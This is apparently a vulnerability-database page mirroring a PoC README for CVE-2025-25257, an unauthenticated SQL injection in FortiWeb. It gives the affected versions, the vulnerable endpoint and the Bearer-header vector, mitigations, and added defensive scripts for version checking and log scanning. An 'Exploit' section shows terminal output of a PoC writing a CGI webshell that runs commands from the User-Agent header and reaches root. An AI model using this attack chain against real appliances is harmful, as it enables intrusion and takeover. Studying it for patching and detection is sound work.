Related vulnerability
Title:
Fortinet FortiWeb SQL Injection Vulnerability
(CVE-2025-25257)
Description: Fortinet FortiWeb is a web application firewall from the US company Fortinet. It blocks threats such as cross-site scripting, SQL injection, cookie poisoning and schema poisoning attacks, securing web applications and protecting sensitive database content. Fortinet FortiWeb 7.6.3 and earlier, 7.4.7 and earlier, 7.2.10 and earlier, and versions before 7.0.10 contain a SQL injection vulnerability caused by improper neutralization of special elements used in SQL commands, which may lead to SQL injection attacks.
Description
CVE-2025-25257
Introduction
# CVE-2025-25257 — FortiWeb Critical SQL Injection Vulnerability 🔥
<img width="665" height="375" alt="bug-removebg-preview" src="https://github.com/user-attachments/assets/57839369-cdde-4166-ba13-cf5a9ff978ad" />
### 🧠 Overview:
* **Vulnerability Type**: Unauthenticated **SQL Injection**
* **Component Affected**: FortiWeb GUI / Fabric Connector API
* **CVSS Score**: **9.6 – 9.8 (Critical)**
* **CWE**: CWE-89 – Improper Neutralization of Special Elements in SQL Commands
* **Discovered & Patched**: July 2025
* **Exploitation Status**: Proof-of-concept publicly available; exploitation expected
---
### 🛠 Affected Versions:
| FortiWeb Version | Affected Range | Fixed Version |
| ---------------- | --------------- | --------------- |
| 7.6 | 7.6.0 to 7.6.3 | 7.6.4 or later |
| 7.4 | 7.4.0 to 7.4.7 | 7.4.8 or later |
| 7.2 | 7.2.0 to 7.2.10 | 7.2.11 or later |
| 7.0 | 7.0.0 to 7.0.10 | 7.0.11 or later |
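As an added example (not part of the original README or the PoC repository), the following Python snippet checks a FortiWeb version string against the affected ranges in the table above so an inventory of appliances can be triaged quickly. The ranges are copied from the table; the accepted version-string prefixes (`v`, `FortiWeb `) and the `unlisted` verdict for branches the table does not cover are assumptions of this example.

```python
# Added example (not from the original advisory): classify a FortiWeb
# version string as vulnerable, patched, or not covered by the table.
from typing import Tuple

# branch -> (last affected patch level, first fixed version), per the table
AFFECTED_RANGES = {
    (7, 6): ((7, 6, 3), "7.6.4"),
    (7, 4): ((7, 4, 7), "7.4.8"),
    (7, 2): ((7, 2, 10), "7.2.11"),
    (7, 0): ((7, 0, 10), "7.0.11"),
}


def parse_version(text: str) -> Tuple[int, int, int]:
    """Parse 'X.Y.Z' (optionally prefixed with 'FortiWeb ' or 'v') into a tuple."""
    text = text.strip()
    for prefix in ("FortiWeb ", "v"):  # assumed prefixes, for convenience
        if text.startswith(prefix):
            text = text[len(prefix):]
    parts = text.split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch = (int(p) for p in parts)
    return major, minor, patch


def assess(version: str) -> dict:
    """Return a verdict dict: status is 'vulnerable', 'patched' or 'unlisted'."""
    major, minor, patch = parse_version(version)
    branch = (major, minor)
    if branch not in AFFECTED_RANGES:
        # Branch absent from the advisory table: report it rather than assume safe.
        return {"version": version, "status": "unlisted", "fixed_in": None}
    last_affected, fixed_in = AFFECTED_RANGES[branch]
    status = "vulnerable" if (major, minor, patch) <= last_affected else "patched"
    return {"version": version, "status": status, "fixed_in": fixed_in}


if __name__ == "__main__":
    for v in ("7.6.3", "7.6.4", "v7.2.10", "FortiWeb 7.0.11", "8.0.0"):
        print(assess(v))
```

Branches the table does not list are reported as `unlisted` rather than `patched`, since the table says nothing about them.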
---
### 🚨 Technical Details:
* The vulnerability allows unauthenticated attackers to **inject SQL** through crafted HTTP/HTTPS requests; no login is required.
* One of the vulnerable endpoints is `/api/fabric/device/status`, where SQL payloads in the `Authorization: Bearer` header can be executed.
* Potential impact includes **full database compromise**, **data theft**, or **remote code execution** via `SELECT … INTO OUTFILE` or similar techniques.
---
### 🔐 Risk:
* **Attack Vector**: Remote, no authentication required
* **Impact**: Full access to FortiWeb backend DB, possible system compromise
* **Threat Level**: **Critical** — especially since FortiWeb is a security appliance
---
### 🧩 Mitigation Steps:
1. **Patch immediately** to the fixed version corresponding to your FortiWeb release.
2. **Restrict or disable HTTP/HTTPS access** to the management interface temporarily.
3. **Monitor logs** for suspicious API calls or Bearer token injections.
4. **Audit internet-facing FortiWeb appliances** and isolate if unpatched.
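As an added example for mitigation step 3 (not code from the original README or the PoC repository), this Python snippet scans HTTP access log lines for requests whose `Authorization: Bearer` value is not a well-formed bearer token, and raises the severity when the request targets the endpoint named above. The log line format and the sample lines are constructed for this example; FortiWeb's own log format differs, so `LOG_LINE_RE` would need adapting to real logs.

```python
# Added example (not from the original advisory): flag requests whose
# Authorization: Bearer value does not look like a legitimate token.
import re
from typing import Dict, List

# RFC 6750 b64token shape: token68 characters plus optional trailing '='.
# Quotes, spaces or comment sequences never belong in a real bearer token.
BEARER_TOKEN_RE = re.compile(r"^[A-Za-z0-9\-._~+/]+=*$")

# Endpoint named in the advisory; hits here are rated higher.
WATCHED_PATHS = {"/api/fabric/device/status"}

# Constructed log format (assumption): <ip> "<method> <path>" <status> authorization="<value>"
LOG_LINE_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>\S+) (?P<path>\S+)" (?P<status>\d{3}) '
    r'authorization="(?P<auth>[^"]*)"$'
)

# Constructed sample log lines for the example.
SAMPLE_LOG = """\
203.0.113.5 "GET /api/fabric/device/status" 401 authorization="Bearer eyJhbGciOiJIUzI1NiJ9.abc.def"
198.51.100.7 "GET /api/fabric/device/status" 500 authorization="Bearer abc' OR 1=1 -- "
198.51.100.7 "GET /api/v2.0/system/status" 200 authorization="Bearer a1b2c3d4"
192.0.2.9 "GET /api/fabric/device/status" 401 authorization="Basic dXNlcjpwYXNz"
"""


def classify_bearer(auth_header: str) -> str:
    """Return 'ok', 'malformed-bearer' or 'not-bearer' for an Authorization value."""
    scheme, _, value = auth_header.partition(" ")
    if scheme.lower() != "bearer":
        return "not-bearer"
    return "ok" if BEARER_TOKEN_RE.fullmatch(value) else "malformed-bearer"


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per request carrying a malformed bearer token."""
    findings: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        if classify_bearer(m["auth"]) != "malformed-bearer":
            continue
        findings.append({
            "ip": m["ip"],
            "path": m["path"],
            "status": m["status"],
            "severity": "high" if m["path"] in WATCHED_PATHS else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The heuristic is deliberately conservative: it does not try to recognise SQL, only to reject anything that cannot be a valid bearer token, which keeps false positives low while still catching the header misuse the advisory describes.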
---
### ✅ TL;DR:
* CVE-2025-25257 is a **critical unauthenticated SQL injection** in FortiWeb.
* Patch now to versions: **7.6.4+, 7.4.8+, 7.2.11+, or 7.0.11+**.
* If unpatched, disable external access to the management GUI.
* Exploitation is likely—treat this as a top priority.
---
### 💀 Exploit:
<img width="1920" height="958" alt="bug1" src="https://github.com/user-attachments/assets/fb8db3c1-e26f-46d4-a247-f7a44f7d332e" />
```
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-25257.py -t https://10.10.10.10:9443/
[*] writing part #!/bin/sh --
p
[*] writing part rintf "Content-T
[*] writing part ype: text/html\r
[*] writing part \n";printf "\r\n
[*] writing part ";eval $HTTP_USE
[*] writing part R_AGENT
[>] writing webshell file
[*] writing part import os #
os
[*] writing part .system('chmod +
[*] writing part x /migadmin/cgi-
[*] writing part bin/x.cgi && rm
[*] writing part -f /var/log/lib/
[*] writing part python3.10/pylab
[*] writing part .py') #
[>] cooking chmod gadget
[*] triggering chmod
[*] executing `id` ...
uid=0(root) gid=0 groups=0
[*] webshell available at:
> https://10.10.10.10:9443/cgi-bin/x.cgi
provide command via the `User-Agent` header!)
```
---
### ⚠️ Disclaimer:
This information is provided for **educational and defensive security purposes only**. Any actions taken using this knowledge must comply with **all applicable laws and ethical standards**. Unauthorized exploitation of systems without explicit permission is **illegal and unethical**. The author assumes **no responsibility** for any misuse or damage resulting from the use of this content.
File snapshot
[4.0K] /data/pocs/0a52edf415200ce3a880fe47b80c2114eb06651e
├── [4.4K] CVE-2025-25257.py
└── [3.6K] README.md
0 directories, 2 files
Notes
1. It is recommended to access the PoC through the original source first.
2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.